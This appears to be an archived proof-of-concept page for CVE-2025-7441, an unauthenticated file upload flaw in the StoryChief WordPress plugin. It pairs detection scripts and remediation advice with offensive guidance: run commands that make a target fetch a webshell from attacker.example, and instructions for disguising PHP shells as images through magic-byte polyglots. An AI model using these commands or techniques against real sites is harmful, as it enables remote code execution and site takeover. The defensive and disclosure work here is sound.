POC details: c0b65e708f5f3b21829b49111648d47de964d8f5

Source
Related vulnerability
Title: WordPress plugin StoryChief code issue vulnerability (CVE-2025-7441)
Description: WordPress and WordPress plugin are both products of the WordPress Foundation. WordPress is a blogging platform written in PHP that lets users host a personal blog on a server running PHP and MySQL. WordPress plugin is an application plugin. WordPress plugin StoryChief 1.0.42 and earlier contain a code issue vulnerability: the /wp-json/storychief/webhook endpoint lacks file type validation, which can lead to arbitrary file upload.
Description
StoryChief <= 1.0.42 - Unauthenticated Arbitrary File Upload
Introduction
# CVE-2025-7441
StoryChief <= 1.0.42 - Unauthenticated Arbitrary File Upload
# 🚨 StoryChief <= 1.0.42 — Unauthenticated Arbitrary File Upload (CVE-2025-7441)

## ℹ️ Summary
StoryChief (WordPress plugin) versions up to and including 1.0.42 expose a critical unauthenticated arbitrary file upload vulnerability via the REST endpoint /wp-json/storychief/webhook. An attacker can cause the plugin to fetch and persist an attacker-controlled remote resource (for example, a webshell) into the site's uploads directory, enabling remote code execution in many default WordPress deployments.

- CVE: CVE-2025-7441  
- CVSS: 9.8 (Critical)

---

## 💥 Impact
- Remote unauthenticated file upload to wp-content/uploads/YYYY/MM/<filename>.  
- Potential for remote code execution when the uploaded file is executable (e.g., PHP).  
- Full site compromise is possible when WordPress is configured to execute uploaded PHP under the document root.

---

## 🧩 Vulnerability Root Cause
The plugin accepts an incoming JSON payload (publish event) that contains a featured_image -> data -> sizes -> full field pointing to an arbitrary URL. StoryChief does not perform sufficient filetype/content validation or restrict the URL source, allowing the plugin to fetch the remote resource and save it under the site's uploads directory. There is insufficient validation to prevent storing files that contain executable code.

---

## 🛠️ Exploit script — what it does (mapping to the vulnerability)
This section explains the exploit script (provided separately) at a high level and maps each important behavior to the underlying vulnerability. 

- CLI argument parsing — target URL (-u/--url), remote shell URL (-shell), optional HMAC key, headers, proxy/timeout/retry flags, debug and print-only options.
- Target normalization — appends /wp-json/storychief/webhook when a site root is supplied.
- Shell URL validation — verifies the remote URL is reachable (HEAD/GET or curl).
- Filename extraction — uses the remote URL basename to infer the final uploads filename.
- Payload construction — places the attacker-controlled URL into data.featured_image.data.sizes.full to force the plugin to fetch and store the file.
- HMAC signing (optional) — computes meta.mac (HMAC-SHA256) using an optional hex key; some servers may ignore or require this.
- Delivery — uses requests with retries/backoff or curl fallback, supports custom headers, proxies, and --no-verify.
- Response handling — parses JSON responses for permalink/id keys to detect success; otherwise reports failure.
- Output — prints the expected uploads path: wp-content/uploads/YYYY/MM/<filename> on success.

---

## 🖼️ Shell file requirements (critical)
When using a .php remote file (for example: https://attacker.example/shell.php) the file must include a valid image header (magic bytes) so it will be treated/accepted as an image by the plugin or image-processing code. Key points:

- Use a polyglot approach: the file should begin with valid image magic bytes (e.g., JPEG, PNG, or GIF) so naive checks and image handlers accept it, while also containing the PHP payload in a section that remains on disk verbatim.
- Common image magic bytes:
  - JPEG: 0xFF 0xD8 0xFF
  - PNG: 0x89 0x50 0x4E 0x47
  - GIF: ASCII "GIF89a" or "GIF87a"
- Do not rely solely on filename/extension. Many plugins inspect file contents or use libraries (GD, ImageMagick) that verify image integrity.
- Environment-dependent: some servers will further validate or re-encode images, which may strip injected code. Test in an authorized lab first.
- Ethical reminder: do NOT publish working webshell code here. Create and test such files only in authorized environments.

---

## ▶️ How to run (examples)
Replace placeholders with authorized targets. All examples below use a .php remote shell URL.

- Basic example:
```bash
python3 CVE-2025-7441.py -u https://target.example -shell https://attacker.example/shell.php
```

- With explicit webhook path and debug:
```bash
python3 CVE-2025-7441.py -u https://target.example/wp-json/storychief/webhook -shell https://attacker.example/shell.php --debug
```

- Use curl instead of requests:
```bash
python3 CVE-2025-7441.py -u https://target.example -shell https://attacker.example/shell.php --use-curl
```

- Print payload only (do not send):
```bash
python3 CVE-2025-7441.py -u https://target.example -shell https://attacker.example/shell.php --print-only
```

Important flags:
- --no-verify: skip TLS verification (use with caution).
- --proxy: route requests through a proxy.
- --header "Key: Value": add custom headers.

---

## 📤 Expected outputs
- Successful run:
  - Uploaded: wp-content/uploads/2025/10/shell.php
- Debug examples:
  - [DEBUG] shell HEAD status: 200
  - [DEBUG] post status: 200
  - [DEBUG] curl cmd: curl -s -X POST https://target... -H Content-Type: application/json -d '{"meta":...}'
- Failure messages:
  - "[-] Error: shell URL is not reachable (not HTTP 200)"
  - "[-] Error: request failed"
  - "[-] Error: upload failed or endpoint returned non-JSON/HTML"

---

## 🔎 Detection & Indicators of Compromise (IoC)
- Unexpected POST requests to /wp-json/storychief/webhook from unknown IPs.
- New files in wp-content/uploads/<YYYY>/<MM>/ with PHP extensions or image extensions containing embedded code.
- Outbound GETs from the web server to attacker-controlled domains (egress or proxy logs), followed by requests for the newly uploaded files in the access log.
- Suspicious image files with appended or embedded non-image content.
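The first three indicators above can be turned into a log check. The script below is an added example, not part of the original report or the exploit script: it parses access-log lines in combined format, flags POSTs to the StoryChief webhook from addresses outside an operator-maintained allowlist (an assumption of this example), and flags any request for an executable file under wp-content/uploads, escalating when the same client previously hit the webhook. The log lines at the bottom are constructed samples.

```python
"""Added example, not the original report's code: triage a WordPress access
log for the StoryChief webhook abuse pattern described in the IoC section."""
import re

WEBHOOK_PATH = "/wp-json/storychief/webhook"
# Executable extensions inside the date-based uploads tree. The pattern also
# catches double extensions such as x.php.jpg, which some Apache handler
# configurations will execute.
UPLOADS_EXEC = re.compile(
    r"/wp-content/uploads/\d{4}/\d{2}/[^ ?]+\.(?:php|phtml|phar)\b", re.I
)
# Combined log format: ip ident user [ts] "METHOD path proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Return a dict of fields, or None for lines not in combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def analyze(lines, trusted_ips=()):
    """Return alerts in log order.

    trusted_ips is the allowlist of addresses the real StoryChief service
    sends webhooks from (assumed to be maintained by the site operator).
    """
    alerts = []
    webhook_posters = set()  # clients that have hit the webhook so far
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["method"] == "POST" and rec["path"].startswith(WEBHOOK_PATH):
            webhook_posters.add(rec["ip"])
            if rec["ip"] not in trusted_ips:
                alerts.append({"kind": "untrusted_webhook_post",
                               "ip": rec["ip"], "ts": rec["ts"]})
        elif UPLOADS_EXEC.search(rec["path"]):
            # A request for an executable under uploads is always worth a
            # look; it is far more suspicious from a client that just posted
            # to the webhook.
            kind = ("upload_exec_after_webhook" if rec["ip"] in webhook_posters
                    else "upload_exec_access")
            alerts.append({"kind": kind, "ip": rec["ip"], "ts": rec["ts"],
                           "path": rec["path"], "status": rec["status"]})
    return alerts


# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.9 - - [12/Oct/2025:10:01:02 +0000] "POST /wp-json/storychief/webhook HTTP/1.1" 200 512 "-" "python-requests/2.32"',
    '198.51.100.4 - - [12/Oct/2025:10:01:10 +0000] "GET /wp-content/uploads/2025/10/photo.jpg HTTP/1.1" 200 10240 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [12/Oct/2025:10:01:15 +0000] "GET /wp-content/uploads/2025/10/shell.php HTTP/1.1" 200 128 "-" "curl/8.0"',
    '192.0.2.77 - - [12/Oct/2025:10:02:00 +0000] "POST /wp-json/storychief/webhook HTTP/1.1" 200 512 "-" "StoryChief-Webhook/1.0"',
]

if __name__ == "__main__":
    # 192.0.2.77 stands in for the vendor's legitimate webhook source here.
    for alert in analyze(SAMPLE_LOG, trusted_ips={"192.0.2.77"}):
        print(alert)
```

Run against a real log with the vendor's documented source addresses in `trusted_ips`; an `upload_exec_after_webhook` alert is the strongest signal, because it ties the file access back to the webhook call that created the file.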

---

## 🛡️ Mitigation & Remediation
Short term:
- Upgrade StoryChief to a patched version immediately when available.
- Block or restrict /wp-json/storychief/webhook via WAF or server rules.
- Restrict server outbound fetches or egress to untrusted domains.

Developer guidance:
- Validate file types and contents after any remote fetch; verify images using safe parsers and reject invalid files.
- Require authentication for webhooks that cause server-side downloads or file creation.
- Ensure HMAC/signature verification is implemented and enforced.
- Store uploaded content outside the webroot or disable execution of uploaded files in wp-content/uploads (web server rules).
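To make the developer guidance concrete, the routine below is an added example (not the StoryChief plugin's code) of the validation a webhook handler should run on bytes it has fetched for data.featured_image.data.sizes.full before writing anything under the uploads directory. It restricts the source host to an assumed allowlist, enforces an extension allowlist, caps the size, checks the image magic bytes listed earlier in this report against the claimed extension, rejects files that carry script open tags anywhere, and never reuses the remote basename. All function and constant names are this example's own.

```python
"""Added example, not the plugin's code: post-fetch validation for a
remotely fetched 'featured image' before it is stored in wp-content/uploads."""
from collections import namedtuple
from urllib.parse import urlsplit
import posixpath
import secrets

Verdict = namedtuple("Verdict", "accepted reason filename")

# Claimed extension -> canonical extension.
ALLOWED_EXT = {".jpg": ".jpg", ".jpeg": ".jpg", ".png": ".png", ".gif": ".gif"}
# Image signatures (the magic bytes from the report) and the extension each implies.
MAGIC = [
    (b"\xff\xd8\xff", ".jpg"),
    (b"\x89PNG\r\n\x1a\n", ".png"),
    (b"GIF87a", ".gif"),
    (b"GIF89a", ".gif"),
]
# Open tags that must never survive into a file the web server might execute.
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script")


def validate_fetched_image(url, data, allowed_hosts, max_bytes=10 * 1024 * 1024):
    """Return Verdict(True, "", server-chosen filename) or Verdict(False, reason, None).

    allowed_hosts is assumed to be the vendor's CDN hostnames that the plugin
    is willing to fetch from; anything else is refused before any parsing.
    """
    parts = urlsplit(url)
    # 1. Restrict where the server will fetch from.
    if parts.scheme != "https" or parts.hostname not in allowed_hosts:
        return Verdict(False, "source host not allowed", None)
    # 2. Extension allowlist on the remote name, which the sender controls.
    ext = posixpath.splitext(posixpath.basename(parts.path))[1].lower()
    if ext not in ALLOWED_EXT:
        return Verdict(False, "extension not allowed", None)
    # 3. Size cap before touching the content.
    if len(data) > max_bytes:
        return Verdict(False, "file too large", None)
    # 4. Content must begin with a known image signature ...
    detected = next((e for magic, e in MAGIC if data.startswith(magic)), None)
    if detected is None:
        return Verdict(False, "not a recognised image format", None)
    # 5. ... and that signature must agree with the claimed extension.
    if ALLOWED_EXT[ext] != detected:
        return Verdict(False, "extension does not match content", None)
    # 6. A valid header is not enough: a polyglot keeps the header and hides
    #    script tags further in, so scan the whole body.
    if any(marker in data.lower() for marker in SCRIPT_MARKERS):
        return Verdict(False, "embedded script tag", None)
    # 7. The server, not the remote URL, chooses the stored filename.
    return Verdict(True, "", secrets.token_hex(8) + detected)


if __name__ == "__main__":
    # Constructed sample inputs: a minimal JPEG-headed blob and the same blob
    # with a harmless PHP open tag appended (no executable payload).
    good = b"\xff\xd8\xff" + b"\x00" * 64
    poly = good + b"<?php /* constructed marker */ ?>"
    hosts = {"cdn.example"}
    print(validate_fetched_image("https://cdn.example/photo.jpg", good, hosts))
    print(validate_fetched_image("https://cdn.example/photo.jpg", poly, hosts))
    print(validate_fetched_image("https://attacker.example/shell.php", good, hosts))
```

Step 6 will also reject legitimate images whose metadata happens to contain one of those byte sequences; re-encoding the accepted image through an image library and discarding the original bytes is the stronger control, and it should be paired with the web-server rule from the list above that disables PHP execution under wp-content/uploads, so that a file which slips past validation still cannot run.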

---

## ⚠️ Limitations & Caveats
- Exploit success depends on server configuration, image-processing libraries, and webserver execution policies.
- Servers that reprocess or re-encode images may remove injected payloads.
- If the plugin verifies signatures, supplying an incorrect mac may cause rejection.

---

## 🤝 Responsible Use
This document is for defenders and authorized testers. Do NOT use these techniques against systems you do not own or have explicit permission to test. Unauthorized exploitation is illegal and unethical.

If you are reporting the issue to a vendor or site owner, include reproduction details, safe remediation steps, and suggested fixes.

---

## 📚 References & Credits
- Report and exploit script by: Nxploited (Khaled Alenazi) — script filename: CVE-2025-7441.py (provided separately)
- CVE: CVE-2025-7441
- CVSS: 9.8
File snapshot

[4.0K] /data/pocs/c0b65e708f5f3b21829b49111648d47de964d8f5
├── [9.4K] CVE-2025-7441.py
├── [1.5K] LICENSE
├── [6.9K] README.md
└── [ 53] requirements.txt

0 directories, 4 files
Cached for you by the Shenlong bot.
Notes
    1. It is recommended to access the original through the source link first.
    2. If the source has gone offline or cannot be reached, send an e-mail to f.jinxu#gmail.com to request the local snapshot (replace # with @).
    3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.